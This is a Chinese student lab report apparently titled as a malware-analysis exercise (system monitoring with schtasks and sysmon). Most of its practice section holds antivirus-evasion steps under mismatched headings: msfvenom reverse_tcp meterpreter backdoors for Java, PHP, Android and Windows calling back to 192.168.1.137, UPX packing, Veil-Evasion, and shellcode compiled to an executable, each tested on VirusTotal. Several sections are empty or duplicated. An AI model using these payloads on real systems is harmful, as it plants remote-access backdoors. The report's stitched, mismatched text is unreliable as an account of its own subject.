Exp4 恶意代码分析
作者:互联网
目录
一、实验目标
1、是监控你自己系统的运行状态,看有没有可疑的程序在运行。
2、分析一个恶意软件,就分析Exp2或Exp3中生成后门软件;分析工具尽量使用原生指令或sysinternals,systracer套件。
3、假定将来工作中你觉得自己的主机有问题,就可以用实验中的这个思路,先整个系统监控看能不能找到可疑对象,再对可疑对象进行进一步分析,好确认其具体的行为与性质。
二、思考题
(一)如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。
1、使用一些工具帮助自己监测系统,可以实时监控电脑上的端口信息,如果某个进程启动的时候连接了一些看起来很可疑的端口,就可以进一步进行分析。
2、使用windows自带的schtasks指令设置一个计划任务,每隔一定的时间对主机的联网记录等进行记录,如果自己的电脑没有联网的情况下出现了ip访问记录就可以进一步分析了。
3、通过sysmon监控计算机中的重要操作,可以在事件查看器中找到相关日志进行查看。
(二)如果已经确定是某个程序或进程有问题,你有什么工具可以进一步得到它的哪些信息。
1、利用wireshark动态分析程序动向,监视其与主机进行的通信过程。
2、利用systracer工具分析恶意软件。
3、利用PE explorer工具对程序调用库等信息进行分析查看,还可以对其反汇编。
三、实践过程
(一)使用schtasks指令监控系统
1、C盘建立一个netstatlog.bat
文件,用来将记录的联网结果格式化输出到netstatlog.txt
文件中
netstatlog.bat:
date /t >> c:\netstatlog.txt
time /t >> c:\netstatlog.txt
netstat -bn >> c:\netstatlog.txt
2、在CMD下,使用schtasks /create /TN netstat5303 /sc MINUTE /MO 5 /TR "cmd /c netstat -bn > c:\netstatlog.txt"
命令创建计划任务netstat5303
msfvenom -p java/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 x> 5328_backdoor_java.jar
图jar
3、生成php文件,并用VirusTotal进行扫描
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 x> 5328_backdoor.php
图php
4、生成apk文件,并用VirusTotal进行扫描
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.137 lport=5328 R> 5328_backdoor.apk
图apk
(二)使用sysmon工具监控系统
安装veil-evasion的时候照着Veil-Evasion下载、安装、使用教程上的步骤安装还算比较顺利,就是真的好慢,装了n个小时。
图Veli安装
图Veli1
1、启动evail-evasion
图启动
2、设置好回连的IP地址和端口号后,生成后门文件
图
3、用VirusTotal进行扫描
图Veil扫描
(三)使用VirusTotal分析恶意软件
1、对(一)1中的5328_backdoor.exe进行加壳
upx 5328_backdoor.exe -o 5328_backdoor_upx.exe
图upx(额,显示文件太小)
2、对(一)1中的met-encoded10.exe进行加壳
upx met-encoded10.exe -o met-encoded10_upx.exe
图upx1(加壳成功)
3、用VirusTotal进行扫描
图upx扫描(发现加壳之后被查出的概率增加了【捂脸】)
(四)使用Process Monitor分析恶意软件
1、在kali主机下,进入终端,执行指令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击者IP LPORT=5328 -f c
生成一个c语言格式的Shellcode数组
图生成Shellcod
2、创建一个C文件:shellcode_5328.c
,将上面生成的数组copy到该文件下,并加入一个主函数
图c文件
3、使用i686-w64-mingw32-g++ shellcode_5328.c -o shellcode_5328_backdoor.exe
命令将该C语言代码shellcode_5328.c
转换为一个可在64位windows系统下操作的可执行文件shellcode_5328_backdoor.exe
图转化
4、用VirusTotal进行扫描
图shellcode扫描
5、将可执行文件放到主机上检测
图主机shellcode检测(可以发现这个文件刚放到主机上,就立即被查杀了)
(五)使用Process Explorer分析恶意软件
(六)使用PEiD分析恶意软件
(七)使用PEiD分析恶意软件
四、实践总结与体会
五、参考资料
免杀原理与实践
杀毒软件工作原理 及 现在主要杀毒技术
Veil-Evasion下载、安装、使用教程
kali安装veil和apt基本命令
标签:分析,exe,恶意代码,恶意软件,Exp4,backdoor,监控,使用,5328 来源: https://www.cnblogs.com/seven-moon/p/12732170.html